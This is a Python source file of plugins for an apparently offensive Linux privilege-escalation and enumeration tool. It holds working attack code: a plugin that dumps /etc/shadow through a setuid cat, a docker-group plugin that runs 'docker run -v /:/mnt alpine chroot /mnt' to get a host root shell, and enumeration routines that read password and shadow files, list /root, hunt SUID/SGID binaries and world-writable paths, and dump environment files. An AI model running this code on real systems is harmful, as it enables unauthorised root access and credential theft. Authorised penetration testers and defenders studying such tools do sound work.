import grp
import os, tempfile
import pathlib, stat
import pty
import subprocess
from os import popen
from subprocess import Popen, PIPE

from plugins import PrivEsc, Enumeration
# A very basic helper, but useful: stage a command in an executable temp file
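def shellRun(command):
    """Write *command* to an executable temp file and tell the user how to run it.

    The file comes from ``tempfile.NamedTemporaryFile`` (created 0600, owner
    only) and is then made executable for the owner only, so another local
    user cannot read or tamper with the staged command before it runs. No
    shebang is added; an interactive shell runs such a file as a script.
    The file is deliberately *not* deleted here - the caller is responsible
    for removing it, which is why its path is returned.

    Args:
        command: Shell text to stage, written verbatim (UTF-8 encoded).

    Returns:
        The path of the staged file.
    """
    with tempfile.NamedTemporaryFile(delete=False) as f:
        fname = f.name
        f.write(command.encode())
    # os.chmod instead of os.system("chmod u+x ..."): same result (0600 ->
    # 0700) without spawning a shell or interpolating a path into it.
    mode = os.stat(fname).st_mode
    os.chmod(fname, mode | stat.S_IXUSR)
    print(f"Execute command with '{fname}'...\nCtrl-D to leave shell")
    return fname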
"""An example plugin that tries to use `sudo su` to get root. | |
Requires being given the password for the current user and relies | |
on the current user having sudo privs, so while technically it | |
escalates proveleges, it does so only if you already have the | |
right credentials | |
""" | |
#shellRun("sudo passwd") | |
#shellRun("sudo id") | |
#shellRun("sudo -l") | |
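def GrabOutput(command):
    """Run *command* without a shell and return its stdout as text.

    Args:
        command: argv list (program followed by its arguments). It is passed
            straight to ``subprocess.run`` with ``shell=False``, so there is
            no shell to inject into and no quoting to get wrong - do not
            pass a single command-line string.

    Returns:
        Decoded stdout. Bytes that are not valid UTF-8 are replaced rather
        than raising, and a non-zero exit status is not treated as an error:
        the caller simply gets whatever the process wrote (possibly ``""``).
        stderr is not captured and stays on the terminal.
    """
    completed = subprocess.run(command, stdout=subprocess.PIPE, check=False)
    return completed.stdout.decode(errors="replace")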
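def CheckBinary(p):
    """Report whether path *p* exists and whether its setuid bit is set.

    Args:
        p: Filesystem path (str or ``pathlib.Path``). Symlinks are followed,
            so a setuid target reached through a symlink reports as setuid.

    Returns:
        ``(exists, suid)``. ``suid`` is always ``False`` when the path is
        missing or unreachable (``ENOENT``/``ENOTDIR``). Any other OSError
        (e.g. permission denied on a parent directory) propagates, exactly
        as a plain ``Path.stat()`` would.
    """
    try:
        # One stat() instead of exists()+stat(): no window between the two
        # calls in which the file can be swapped, and one syscall fewer.
        mode = pathlib.Path(p).stat().st_mode
    except (FileNotFoundError, NotADirectoryError):
        return (False, False)
    return (True, bool(mode & stat.S_ISUID))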
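class linCatEscalator(PrivEsc):
    """PrivEsc plugin: read /etc/shadow through a setuid ``cat``.

    A setuid bit on ``cat`` is a misconfiguration - anyone who can run it
    can read any file with the owner's privileges. The plugin only reads
    and prints; it does not modify the system.
    """

    def __init__(self):
        # NOTE(review): PrivEsc.__init__ is not called here, unlike the
        # Enumeration plugins in this file - confirm the base class needs
        # no initialisation.
        self.name = "CatEscalator"
        self.author = "Omar Alhendi"
        self.description = "Showing Restricted file /etc/shadow using misonfigured cat"
        self.version = ""

    def execute(self):
        """Dump /etc/shadow if ``/bin/cat`` exists and carries the setuid bit."""
        catPath = "/bin/cat"
        exists, suid = CheckBinary(catPath)
        if not exists:
            print(f"{catPath} doesn't exist")
            return
        if not suid:
            print("cat doesn't have SUID bit set on")
            return
        # argv list, no shell: both the binary and the target are fixed.
        out = GrabOutput([catPath, "/etc/shadow"])
        if not out.strip():
            # GrabOutput returns "" when cat fails (e.g. the bit is ignored on
            # a nosuid mount); say so instead of printing a blank line.
            print(f"{catPath} is SUID but produced no output - read failed?")
            return
        print(out)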
class HostInfo(Enumeration):
    """Enumeration plugin: dump basic host, user, kernel and environment facts.

    Every command is a fixed string handed to ``os.system`` (a shell is
    needed for the pipelines); nothing from the target or the user is
    interpolated, so there is no injection surface. Output goes straight to
    the terminal. Tools absent on a given distro (``rpm`` on Debian, for
    instance) simply fail - the shell reports them on stderr - and the run
    continues with the next command.
    """

    # (banner lines printed first, then commands run in order) per section.
    # An empty banner string prints the blank separator line.
    _SECTIONS = (
        ((), ("hostname", "whoami")),
        ((" Confidential And Users",),
         ("id", "who", "w", "last", "cat /etc/passwd | cut -d: -f1",
          "ps aux", "ps -ef")),
        (("", " Kernel Version"),
         ("uname -a", "uname -mrs", "rpm -q kernel", "dmesg | grep Linux",
          "ls /boot | grep vmlinuz-")),
        (("", " Environmental Variables"),
         ("cat /etc/profile", "cat /etc/bashrc", "cat ~/.bash_profile",
          "cat ~/.bashrc", "cat ~/.bash_logout", "env", "set")),
        (("", " Sensitive Information"), ("cat /etc/passwd", "cat /etc/group")),
        (("", " Files Privilegs"), ("ls -la",)),
    )

    def __init__(self):
        super().__init__()
        self.name = "Host Information"
        self.author = "Omar ALhendi"
        self.description = "Provides basic inforamdtion about the host"
        self.version = "2.0"

    def execute(self):
        """Print each section's banner, then run its commands in order."""
        for banner, commands in self._SECTIONS:
            for line in banner:
                print(line)
            for cmd in commands:
                os.system(cmd)
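class NetInfo(Enumeration):
    """Enumeration plugin: interfaces, routes, listeners, firewall and DNS.

    Every command is a fixed string handed to ``os.system`` (a shell is
    needed for the pipelines); nothing target- or user-supplied is
    interpolated, so there is no injection surface. Missing tools
    (``ifconfig``/``netstat``/``chkconfig`` are absent on many modern
    distros) simply fail and the run continues.
    """

    # (banner lines printed first, then commands run in order) per section.
    # An empty banner string prints the blank separator line.
    _SECTIONS = (
        (("",),
         # Was a bare "ip", which only prints iproute2's usage text and
         # exits non-zero; "ip addr" is the interface listing that was meant.
         ("ip addr", "ifconfig", "netstat -p", "route", "lsof -i",
          "lsof -i :80", "grep 80 /etc/services", "netstat -antup",
          "netstat -antpx", "netstat -tulpn", "chkconfig --list",
          "chkconfig --list | grep 3:on", "last", "w",
          "cat /etc/resolv.conf", "cat /etc/sysconfig/network",
          "cat /etc/networks", "iptables -L")),
        # NOTE(review): this repeats four commands from the section above
        # verbatim; kept as-is, but it is probably a copy-paste leftover.
        (("", "Other Hosts and Computers Communicating"),
         ("netstat -antup", "netstat -antpx", "netstat -tulpn",
          "chkconfig --list")),
    )

    def __init__(self):
        Enumeration.__init__(self)
        self.name = "Network Information"
        self.author = "Omar ALhendi"
        self.description = "Provides basic inforamtion about the network"
        self.version = "2.0"

    def execute(self):
        """Print each section's banner, then run its commands in order."""
        for banner, commands in self._SECTIONS:
            for line in banner:
                print(line)
            for cmd in commands:
                os.system(cmd)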
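class AppInfo(Enumeration):
    """Enumeration plugin: running processes, root processes, installed packages.

    Every command is a fixed string handed to ``os.system``; nothing from the
    target or the user is interpolated, so there is no injection surface.
    Package-manager commands for the "other" distro family simply fail.
    """

    # (banner lines printed first, then commands run in order) per section.
    # An empty banner string prints the blank separator line.
    _SECTIONS = (
        (("", "Current Services Running"),
         ("ps aux", "ps -ef", "cat /etc/services")),
        # The grep also matches its own command line; harmless noise.
        (("", "By Root"), ("ps aux | grep root", "ps -ef | grep root")),
        (("", "Application Installed and Running"),
         # Path was "/var/cache/apt/archivesO" (stray trailing O), so the
         # apt cache listing always failed with "No such file or directory".
         ("dpkg -l", "rpm -qa", "ls -alh /var/cache/apt/archives/",
          "ls -alh /var/cache/yum/")),
    )

    def __init__(self):
        Enumeration.__init__(self)
        self.name = "Applications and Services"
        self.author = "Omar ALhendi"
        self.description = "Provides Information about The Applications And Services"
        # NOTE(review): no self.version is set here, unlike the other
        # plugins - confirm whether Enumeration.__init__ supplies a default.

    def execute(self):
        """Print each section's banner, then run its commands in order."""
        for banner, commands in self._SECTIONS:
            for line in banner:
                print(line)
            for cmd in commands:
                os.system(cmd)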
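lineBreak = "--------------------------------------"  # Visual separator between result sections
# Initial "results" value shared by every check below (and by linCronInfo).
# findResults() rebinds each entry's "results" to a fresh list, so the
# sharing is harmless.
results = []
# Sensitive-file and permission checks (Ben Roxbee Cox). Each "cmd" is a
# static shell command line executed by findResults() with shell=True -
# keep them hard-coded; never build one from target- or user-supplied text.
linSensitiveFiles = {
    "GROUP": {"cmd": "cat /etc/group", "msg": "Can You Read The Groups File?", "results": results},
    "SHADOW": {"cmd": "cat /etc/shadow", "msg": "Can You Read The Shadow File?", "results": results},
    "MAIL": {"cmd": "ls -alh /var/mail/", "msg": "Any Mail?", "results": results},
    "ROOTDIR": {"cmd": "ls -al /root/", "msg": "Can you read the root directory?", "results": results},
    "HOMEDIR": {"cmd": "ls -al /home/", "msg": "Any interesting files in the home directory?", "results": results},
    # "results" was missing from this entry, so showResults() raised
    # KeyError on a dict that findResults() had not populated yet.
    "SGID": {"cmd": "find / -perm -g=s -type f 2>/dev/null", "msg": "Any useful SGID Files?", "results": results},
    "SUID": {"cmd": "find / -perm -u=s -type f 2>/dev/null", "msg": "Any useful SUID Files?", "results": results},
    # Was '\( -perm -o w -perm -o x \)': GNU find's -perm takes exactly one
    # mode argument, so the bare 'w' is rejected and, with stderr discarded,
    # the check silently returned nothing. '-perm -o=wx' requires both the
    # other-write and other-execute bits, which is what was intended. It
    # also lists directories (-type d), so the message now says so.
    "WRLDWX": {"cmd": "find / -perm -o=wx -type d 2>/dev/null", "msg": "World Writable & Executable Directories", "results": results},
}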
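def findResults(eCommands):
    """Run each entry's ``cmd`` through the shell and store its stdout lines.

    Every value in *eCommands* is a dict with a ``"cmd"`` key holding a
    shell command line. This function sets (or overwrites) the entry's
    ``"results"`` key with the command's stdout split into lines. Newlines
    are kept on each line so that ``showResults``, which prints the pieces
    back to back, still separates them. (Output used to be split on ``"/"``,
    which tore paths such as ``/usr/bin/sudo`` into ``usr``, ``bin``, ...)

    The commands run with ``shell=True`` because the entries rely on pipes,
    globs and redirections. Only static, hard-coded command strings belong
    in the dict - never text derived from the target host or from user
    input. stderr is captured and discarded (most entries redirect it
    anyway), so a missing tool just yields an empty result list.

    Args:
        eCommands: ``{key: {"cmd": str, "msg": str, ...}}``. Mutated in place.

    Returns:
        The same dict, with every ``"results"`` populated as ``list[bytes]``.
    """
    for entry in eCommands.values():
        proc = subprocess.Popen(entry["cmd"], stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, shell=True)
        output, _stderr = proc.communicate()
        entry["results"] = output.splitlines(keepends=True)
    return eCommands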
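def showResults(output):
    """Print each check's banner and its collected results to the terminal.

    Args:
        output: ``{key: {"msg": str, "results": list[bytes]}}`` as returned
            by ``findResults``. An entry with no ``"results"`` key (a dict
            that was never run) is printed with an empty body instead of
            raising ``KeyError``.

    Results are written one after another, each followed by a space, so they
    only land on separate lines when each result still carries its newline.
    Blank results are skipped: the old test compared ``bytes.strip()`` with
    the *str* ``""``, which is never equal, so nothing was ever filtered.
    Bytes that are not valid UTF-8 (an odd filename, say) are replaced
    rather than aborting the whole listing.
    """
    for item in output:
        msg = output[item]["msg"]
        found = output[item].get("results", [])
        print("\n\n" + "[+] " + msg + "\n" + lineBreak)
        for chunk in found:
            if chunk.strip():
                print(chunk.decode("utf-8", errors="replace") + " ", end="")
        print("\n")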
class linCronInfo(Enumeration):
    """Enumeration plugin: list cron directories and flag world-writable entries.

    Both checks are static shell command lines executed by ``findResults``
    (``shell=True``) and printed by ``showResults``; nothing user-supplied
    is interpolated into them.
    """

    def __init__(self):
        super().__init__()
        self.name = "Cron Jobs"
        self.author = "Ben Roxbee Cox"
        self.description = "List running Cron jobs"

    def execute(self):
        """Run the two cron checks and print whatever they return."""
        checks = {
            # Long listing of every /etc/cron* entry (-p marks directories).
            "CRON": {"cmd": "ls -p -la /etc/cron* 2>/dev/null",
                     "msg": "Scheduled cron jobs", "results": results},
            # Keep lines whose mode string ends in "w?" - i.e. the
            # other-write bit is set.
            "CRONW": {"cmd": "ls -aRl /etc/cron* 2>/dev/null | awk '$1 ~ /w.$/' 2>/dev/null",
                      "msg": "Writable cron dirs", "results": results},
        }
        showResults(findResults(checks))
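class docker(PrivEsc):
    """PrivEsc plugin: root shell on the host via ``docker`` group membership.

    Members of the ``docker`` group may talk to the Docker daemon, which runs
    as root, so membership is root-equivalent by design rather than a
    patched bug: bind-mounting ``/`` into a container and chroot-ing into it
    yields a root shell on the host.
    """

    def __init__(self):
        # NOTE(review): PrivEsc.__init__ is not called here, unlike the
        # Enumeration plugins in this file - confirm the base class needs
        # no initialisation.
        self.name = "Exploit Docker"
        self.author = "Ben Roxbee Cox"
        self.description = "Exploits a known vulnerability if a user is in the Docker group"
        self.version = ""

    @staticmethod
    def _in_docker_group():
        """Return True if the process's primary or supplementary gids include ``docker``.

        Resolves real group ids instead of grepping ``id`` output: the old
        ``"docker" in id_output`` test also matched any user or group whose
        *name contains* "docker" (``dockerroot``, ``docker-ro``, a user
        called ``docker1`` ...) and so fired on hosts where the exploit
        cannot work.
        """
        gids = set(os.getgroups())
        gids.add(os.getgid())
        for gid in gids:
            try:
                if grp.getgrgid(gid).gr_name == "docker":
                    return True
            except KeyError:
                # gid without an /etc/group entry (deleted group); skip it.
                continue
        return False

    def execute(self):
        """Spawn a root shell on the host if the docker group check passes."""
        if not self._in_docker_group():
            print("Current user is not in the docker group")
            return
        # Static command, no user input. Docker pulls alpine if it is not
        # present locally; -it needs a terminal, as the rest of this tool does.
        os.system("docker run -it -v /:/mnt alpine chroot /mnt")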